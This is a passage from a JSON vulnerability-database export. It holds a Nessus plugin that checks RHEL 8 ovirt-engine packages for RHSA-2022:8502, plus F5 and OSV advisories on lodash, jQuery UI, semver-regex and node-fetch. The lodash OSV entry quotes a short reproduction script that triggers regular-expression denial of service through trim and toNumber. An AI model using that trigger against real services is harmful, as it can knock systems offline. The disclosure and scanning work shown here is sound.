else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ovirt-engine / ovirt-engine-backend / ovirt-engine-dbscripts / etc');\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-02-05T16:42:23", "description": "The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2022:8502 advisory.\n\n - follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor (CVE-2022-0155)\n\n - ovirt-engine: RHVM admin password is logged unfiltered when using otopi-style (CVE-2022-2805)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-11-16T00:00:00", "type": "nessus", "title": "RHEL 8 : RHV Manager (ovirt-engine) [ovirt-4.5.3] bug fix and (RHSA-2022:8502)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0155", "CVE-2022-2805"], "modified": "2023-02-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:8", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-backend", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-dbscripts", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-dwh", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-dwh-grafana-integration-setup", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-dwh-setup", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-health-check-bundler", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-restapi", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-base", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-cinderlib", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-imageio", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-ovirt-engine", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-ovirt-engine-common", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-vmconsole-proxy-helper", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-websocket-proxy", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-tools", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-tools-backup", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-ui-extensions", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-vmconsole-proxy-helper", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-webadmin-portal", "p-cpe:/a:redhat:enterprise_linux:ovirt-engine-websocket-proxy", "p-cpe:/a:redhat:enterprise_linux:ovirt-web-ui", "p-cpe:/a:redhat:enterprise_linux:python3-ovirt-engine-lib", "p-cpe:/a:redhat:enterprise_linux:rhvm"], "id": "REDHAT-RHSA-2022-8502.NASL", "href": "https://www.tenable.com/plugins/nessus/167749", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2022:8502. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(167749);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/02\");\n\n script_cve_id(\"CVE-2022-0155\", \"CVE-2022-2805\");\n script_xref(name:\"RHSA\", value:\"2022:8502\");\n\n script_name(english:\"RHEL 8 : RHV Manager (ovirt-engine) [ovirt-4.5.3] bug fix and (RHSA-2022:8502)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2022:8502 advisory.\n\n - follow-redirects: Exposure of Private Personal Information to an Unauthorized Actor (CVE-2022-0155)\n\n - ovirt-engine: RHVM admin password is logged unfiltered when using otopi-style (CVE-2022-2805)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-0155\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2022-2805\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2022:8502\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2044556\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/2079545\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-0155\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-2805\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(312, 359);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-backend\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-dbscripts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-dwh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-dwh-grafana-integration-setup\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-dwh-setup\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-health-check-bundler\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-restapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-cinderlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-imageio\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-ovirt-engine\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-ovirt-engine-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-vmconsole-proxy-helper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-setup-plugin-websocket-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-tools-backup\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-ui-extensions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-vmconsole-proxy-helper\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-webadmin-portal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-engine-websocket-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ovirt-web-ui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python3-ovirt-engine-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhvm\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'Red Hat 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/layered/rhel8/x86_64/rhv-manager/4.4/debug',\n 'content/dist/layered/rhel8/x86_64/rhv-manager/4.4/os',\n 'content/dist/layered/rhel8/x86_64/rhv-manager/4.4/source/SRPMS'\n ],\n 'pkgs': [\n {'reference':'ovirt-engine-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-backend-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-dbscripts-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-dwh-4.5.7-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-dwh-grafana-integration-setup-4.5.7-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-dwh-setup-4.5.7-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-health-check-bundler-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-restapi-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-setup-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-setup-base-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-setup-plugin-cinderlib-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-setup-plugin-imageio-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-setup-plugin-ovirt-engine-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-setup-plugin-ovirt-engine-common-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-setup-plugin-vmconsole-proxy-helper-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-setup-plugin-websocket-proxy-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-tools-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-tools-backup-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-ui-extensions-1.3.6-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-vmconsole-proxy-helper-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-webadmin-portal-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-engine-websocket-proxy-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'ovirt-web-ui-1.9.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'python3-ovirt-engine-lib-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'},\n {'reference':'rhvm-4.5.3.2-1.el8ev', 'release':'8', 'el_string':'el8ev', 'rpm_spec_vers_cmp':TRUE, 'exists_check':'rhevm-4'}\n ]\n }\n];\n\nvar applicable_repo_urls = rhel_determine_applicable_repository_urls(constraints:constraints);\nif(applicable_repo_urls == RHEL_REPOS_NO_OVERLAP_MESSAGE) exit(0, RHEL_REPO_NOT_ENABLED);\n\nvar flag = 0;\nforeach var constraint_array ( constraints ) {\n var repo_relative_urls = NULL;\n if (!empty_or_null(constraint_array['repo_relative_urls'])) repo_relative_urls = constraint_array['repo_relative_urls'];\n foreach var pkg ( constraint_array['pkgs'] ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(pkg['reference'])) reference = pkg['reference'];\n if (!empty_or_null(pkg['release'])) _release = 'RHEL' + pkg['release'];\n if (!empty_or_null(pkg['sp'])) sp = pkg['sp'];\n if (!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'ovirt-engine / ovirt-engine-backend / ovirt-engine-dbscripts / etc');\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "f5": [{"lastseen": "2022-05-06T19:33:06", "description": "When running in Appliance mode, the BIG-IP Guided Configuration GUI menu is vulnerable through the following third-party CVEs:\n\n * [CVE-2021-23337](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-23337>)\n\nLodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.\n\n * [CVE-2020-28500](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-28500>)\n\nLodash versions prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.\n\n * [CVE-2016-7103](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2016-7103>)\n\nCross-site scripting (XSS) vulnerability in jQuery UI before 1.12.0 might allow remote attackers to inject arbitrary web script or HTML via the closeText parameter of the dialog function.\n\nImpact\n\nIn Appliance mode, this vulnerability may allow an authenticated attacker with administrator role privileges and network access to the affected Guided Configuration GUI menu through the BIG-IP management port or self IP addresses, to execute arbitrary system commands and create or delete files. The vulnerability allows the bypass of Appliance mode security on BIG-IP systems by allowing the execution of arbitrary Advanced Shell (**bash**) commands. There is no data plane exposure; this is a control plane issue only.\n\n**Note**: For ASM Guided Configuration, an additional Advanced WAF license is required for it to be available in the Configuration utility Security menu. \n", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-06T18:48:00", "type": "f5", "title": "Appliance mode authenticated F5 BIG-IP Guided Configuration third-party lodash and jQuery vulnerabilities CVE-2021-23337, CVE-2020-28500, and CVE-2016-7103 ", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7103", "CVE-2020-28500", "CVE-2021-23337"], "modified": "2022-05-06T18:56:00", "id": "F5:K12492858", "href": "https://support.f5.com/csp/article/K12492858", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-02-08T16:41:15", "description": "Versions of lodash lower than 4.17.12 are vulnerable to Prototype Pollution. The function defaultsDeep could be tricked into adding or modifying properties of Object.prototype using a constructor payload. ([CVE-2019-10744](<https://vulners.com/cve/CVE-2019-10744>))\n\nImpact\n\nAn attacker can use Function inside of vulnerable versions of **lodash** to execute malicious code using the Traffic Management User Interface (TMUI) or iControl REST API.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2019-11-13T21:50:00", "type": "f5", "title": "Lodash library vulnerability CVE-2019-10744", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-10744"], "modified": "2021-11-18T06:36:00", "id": "F5:K47105354", "href": "https://support.f5.com/csp/article/K47105354", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "osv": [{"lastseen": "2022-06-10T05:05:46", "description": "An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the semver-regex npm package, when an attacker is able to supply arbitrary input to the test() method", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2022-06-03T00:01:00", "type": "osv", "title": "Regular expression denial of service in semver-regex", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-43307"], "modified": "2022-06-03T22:26:33", "id": "OSV:GHSA-4X5V-GMQ8-25CH", "href": "https://osv.dev/vulnerability/GHSA-4x5v-gmq8-25ch", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-05-12T01:23:36", "description": "### Impact\nNode Fetch did not honor the `size` option after following a redirect, which means that when a content size was over the limit, a `FetchError` would never get thrown and the process would end without failure.\n\nFor most people, this fix will have a little or no impact. However, if you are relying on node-fetch to gate files above a size, the impact could be significant, for example: If you don't double-check the size of the data after `fetch()` has completed, your JS thread could get tied up doing work on a large file (DoS) and/or cost you money in computing.\n\n### Patches\nWe released patched versions for both stable and beta channels:\n\n- For `v2`: 2.6.1\n- For `v3`: 3.0.0-beta.9\n\n### Workarounds\nNone, it is strongly recommended to update as soon as possible.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [node-fetch](https://github.com/node-fetch/node-fetch/issues/new?assignees=&labels=question&template=support-or-usage.md&title=Question%3A+)\n* Contact one of the core maintainers.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2020-09-10T17:46:21", "type": "osv", "title": "The `size` option isn't honored after following a redirect in node-fetch", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15168"], "modified": "2021-01-07T22:57:38", "id": "OSV:GHSA-W7RC-RWVF-8Q5R", "href": "https://osv.dev/vulnerability/GHSA-w7rc-rwvf-8q5r", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-05-11T21:07:41", "description": "All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions. Steps to reproduce (provided by reporter Liyuan Chen): var lo = require('lodash'); function build_blank (n) { var ret = \"1\" for (var i = 0; i < n; i++) { ret += \" \" } return ret + \"1\"; } var s = build_blank(50000) var time0 = Date.now(); lo.trim(s) var time_cost0 = Date.now() - time0; console.log(\"time_cost0: \" + time_cost0) var time1 = Date.now(); lo.toNumber(s) var time_cost1 = Date.now() - time1; console.log(\"time_cost1: \" + time_cost1) var time2 = Date.now(); lo.trimEnd(s) var time_cost2 = Date.now() - time2; console.log(\"time_cost2: \" + time_cost2)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 1.4}, "published": "2022-01-06T20:30:46", "type": "osv", "title": "Regular Expression Denial of Service (ReDoS) in lodash", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-28500"], "modified": "2022-02-08T21:35:28", "id": "OSV:GHSA-29MW-WPGM-HMR9", "href": "https://osv.dev/vulnerability/GHSA-29mw-wpgm-hmr9", "cvss": 